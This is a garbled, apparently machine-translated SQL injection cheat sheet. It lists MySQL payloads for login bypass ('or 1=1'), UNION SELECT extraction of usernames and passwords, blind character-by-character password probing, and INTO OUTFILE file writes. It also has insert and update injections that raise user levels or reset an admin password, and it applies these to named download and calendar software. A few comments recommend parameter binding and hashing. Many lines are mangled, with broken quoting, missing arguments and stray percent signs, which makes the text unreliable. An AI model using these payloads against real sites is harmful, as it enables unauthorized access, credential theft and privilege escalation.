Or 1 = 1
Or 1 = 1
/*
% 23
And password = mypass
Id =-1 union select 1, 1
Id =-1 union select char (97), char (97), char (97)
Id = 1 union select 1, 1 from members
Id = 1 union select 1, 1 from admin
Id = 1 union select 1, 1 from user
Userid = 1 and password = mypass
Userid = 1 and mid (password, 112) = char)
Userid = 1 and mid (password, 4, 1) = char (97)
And ord (mid (password, 111)> (the ORD function is useful here because it returns an integer)
And LENGTH (password) = 6 (probes the LENGTH of the password)
And LEFT (password, 1) = m
And LEFT (password, 2) = my
...................... And so on
Union select 1, username, password from user /*
Union select 1, username, password from user /*
= Union select 1, username, password from user/* (the prefix can be either `1` or `=` directly)
99999 union select 1, username, password from user /*
Into outfile c:/file.txt (export file)
= Or 1 = 1 into outfile c:/file.txt
1 union select 1, username, password from user into outfile c:/user.txt
SELECT password FROM admins WHERE login = John into dumpfile/path/to/site/file.txt
Id = union select 1, username, password from user into outfile
Id =-1 union select 1, database (), version () (flexible application query)
Commonly used query test statements:
-- Probe predicates that hold (or are truthy in MySQL) without depending on row
-- data.  A query that suddenly matches every row once one of these is appended
-- is the classic sign that user input reached the SQL parser; binding the value
-- as a parameter instead of concatenating it keeps the text from being parsed.
SELECT * FROM table WHERE 1 = 1
SELECT * FROM table WHERE uuu = uuu
SELECT * FROM table WHERE 1 <> 2
SELECT * FROM table WHERE 3> 2
SELECT * FROM table WHERE 2 <3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1 + 1
-- in MySQL "--" is only a comment when followed by whitespace, so this reads as 1 - (-1)
SELECT * FROM table WHERE 1--1
SELECT * FROM table where isnull (NULL)
-- assumes COT(0) returns NULL; recent MySQL versions raise an out-of-range error instead
SELECT * FROM table where isnull (COT (0 ))
SELECT * FROM table WHERE 1 IS NOT NULL
SELECT * FROM table WHERE NULL IS NULL
SELECT * FROM table WHERE 2 BETWEEN 1 AND 3
-- unlike the constant predicates above, this one depends on columns a, B and c
SELECT * FROM table WHERE B BETWEEN a AND c
SELECT * FROM table WHERE 2 IN (0, 1, 2)
SELECT * FROM table where case when 1> 0 THEN 1 END
Example 1: Night Cat Download System version 1.0
Id = 1 union select, 1
Union select, 1 from ymdown_user
Union select 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from ymdown_user where id = 1
Id = 10000 union select, 1 from ymdown_user where id = 1 and groupid = 1
Union select 1, username, 1, password, 1 from ymdown_user where id = 1 (replace columns to look for the password)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password )) = 49 (checks the first character of the password)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password )) = 50 (second digit)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password,) = 51
........................................ ..........................
Example 2: gray track transformation id test (meteor)
Union % 20 (SELECT % 20 allowsmilies, public, userid, 0000-0-0, user (), version () % 20 FROM % 20calendar_events % 20 WHERE % 20 eventid % 20 = % 2013) % 20 order % 20by % 20 eventdate
Union % 20 (SELECT % 20 allowsmilies, public, userid, 0000-0-0, pass (), version () % 20 FROM % 20calendar_events % 20 WHERE % 20 eventid % 20 = % 2010) % 20 order % 20by % 20 eventdate
Constructed statements:
SELECT allowsmilies, public, userid, eventdate, event, subject FROM calendar_events WHERE eventid = 1 union (select 1, 1, 1, 1, 1 from user where userid = 1)
SELECT allowsmilies, public, userid, eventdate, event, subject FROM calendar_events WHERE eventid = 1 union (select 1, 1, 1, 1, username, password from user where userid = 1)
UNION % 20 (SELECT % ,,0, 205-01-01, a, password % 20 FROM % 20 user % 20 WHERE % 20 userid % 20 = %) % 20 order % 20by % 20 eventdate
UNION % 20 (SELECT % ,,0, 12695, 1999-01-01, a, password % 20 FROM % 20 user % 20 WHERE % 20 userid = 13465) % 20 order % 20by % 20 eventdate
UNION % 20 (SELECT % ,,0, 12695, 1999-01-01, a, userid % 20 FROM % 20 user % 20 WHERE % 20 username = sandflee) % 20 order % 20by % 20 eventdate (looks up the userid of sandflee)
(SELECT a FROM table_name WHERE a = 10 and B = 1 ORDER BY a LIMIT 10)
SELECT * FROM article WHERE articleid = $ id union select * FROM... (when the column count matches the target table's, the statement can be submitted as-is)
SELECT * FROM article WHERE articleid = $ id union select, 1 FROM ...... (when the column counts differ)
Special tips: for forms, search fields and other input boxes:
"___"
".__"
"%
% Order by articleid /*
% Order by articleid #
_ Order by articleid /*
_ Order by articleid #
$ Command = "dir c:"; system ($ command );
SELECT * FROM article WHERE articleid = $ id
SELECT * FROM article WHERE articleid = $ id
1 and 1 = 2 union select * from user where userid = 1 /*
(SELECT * FROM article WHERE articleid = 1 and 1 = 2 union select * from user where userid = 1 /*)
1 and 1 = 2 union select * from user where userid = 1
Statement format: create the database and insert a row:
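-- Demo schema for the examples on this page (MySQL dialect).  The original
-- quoting was mangled: identifiers take backticks, not single quotes, and the
-- string literals in the INSERT and the DEFAULT clauses need quotes.
CREATE DATABASE IF NOT EXISTS `inobjection`;
USE `inobjection`;
CREATE TABLE IF NOT EXISTS `user` (
    `userid`   INT(11)     NOT NULL AUTO_INCREMENT,
    `username` VARCHAR(20) NOT NULL DEFAULT '',
    -- NOTE(review): kept in clear text only because some examples on this page
    -- compare it literally; a real schema would store a password hash.
    `password` VARCHAR(20) NOT NULL DEFAULT '',
    PRIMARY KEY (`userid`)
);
-- explicit column list so the row survives schema additions
INSERT INTO `user` (userid, username, password) VALUES (1, 'swap', 'mypass');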
Insert statements used when registering a user:
Insert into 'user' (userid, username, password, homepage, userlevel) VALUES (, $ username, $ password, $ homepage, 1 );
"Insert into membres (login, password, nom, email, userlevel) VALUES ($ login, $ pass, $ nom, $ email, 1 )";
Insert into membres (login, password, nom, email, userlevel) VALUES (, 3) #, 1)
"Insert into membres SET login = $ login, password = $ pass, nom = $ nom, email = $ email ";
Insert into membres SET login =, password =, nom =, userlevel = 3, email =
"Insert into membres VALUES ($ id, $ login, $ pass, $ nom, $ email, 1 )";
UPDATE user SET password = $ password, homepage = $ homepage WHERE id = $ id
UPDATE user SET password = MD5 (mypass) WHERE username = admin #), homepage = $ homepage WHERE id = $ id
"UPDATE membres SET password = $ pass, nom = $ nom, email = $ email WHERE id = $ id ";
UPDATE membres SET password = [PASS], nom =, userlevel = 3, email = WHERE id = [ID]
"UPDATE news SET Votes = Votes + 1, score = score + $ note WHERE idnews = $ id ";
Related functions:
DATABASE ()
USER ()
SYSTEM_USER ()
SESSION_USER ()
CURRENT_USER ()
For example:
UPDATE article SET title = $ title WHERE articleid = 1 (with the corresponding function substituted for $ title):
UPDATE article SET title = DATABASE () WHERE id = 1
# Writes the current database name into the title field
UPDATE article SET title = USER () WHERE id = 1
# Writes the current MySQL user name into the title field
UPDATE article SET title = SYSTEM_USER () WHERE id = 1
# Writes the current MySQL user name into the title field (SYSTEM_USER() is a synonym for USER())
UPDATE article SET title = SESSION_USER () WHERE id = 1
# Writes the current MySQL user name into the title field (SESSION_USER() is a synonym for USER())
UPDATE article SET title = CURRENT_USER () WHERE id = 1
# Writes the authenticated user name of the current session into the title field
:::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::
$ Req = "SELECT * FROM membres WHERE name LIKE % $ search % order by name ";
SELECT * FROM membres WHERE name LIKE % order by uid # % order by name
SELECT * FROM membres WHERE name LIKE % order by uid # % order by name
SELECT uid FROM admins WHERE login = OR a = a AND password = OR a = a (Classic)
SELECT uid FROM admins WHERE login = OR admin_level = 1 # AND password =
SELECT * FROM table WHERE msg LIKE % hop
SELECT uid FROM membres WHERE login = Bob AND password LIKE a % # AND password =
SELECT * FROM membres WHERE name LIKE % order by uid # % order by name